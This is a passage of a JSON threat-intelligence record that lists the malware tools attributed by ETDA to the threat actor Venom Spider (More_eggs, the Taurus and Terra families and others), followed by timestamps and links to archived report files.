			"source_name": "ETDA:Venom Spider",
			"tools": [
				"More_eggs",
				"PureLocker",
				"SONE",
				"SpicyOmelette",
				"StealerOne",
				"Taurus Builder",
				"Taurus Builder Kit",
				"Taurus Loader",
				"Taurus Loader Reconnaissance Module",
				"Taurus Loader Stealer Module",
				"Taurus Loader TeamViewer Module",
				"Terra Loader",
				"TerraCrypt",
				"TerraLogger",
				"TerraPreter",
				"TerraRecon",
				"TerraStealer",
				"TerraTV",
				"TerraWiper",
				"ThreatKit",
				"VenomKit",
				"VenomLNK",
				"lite_more_eggs"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434464,
	"ts_updated_at": 1775792168,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/026b032f45e8456ea6c79cd9b5dbadef372f31a5.pdf",
		"text": "https://archive.orkl.eu/026b032f45e8456ea6c79cd9b5dbadef372f31a5.txt",
		"img": "https://archive.orkl.eu/026b032f45e8456ea6c79cd9b5dbadef372f31a5.jpg"
	}
}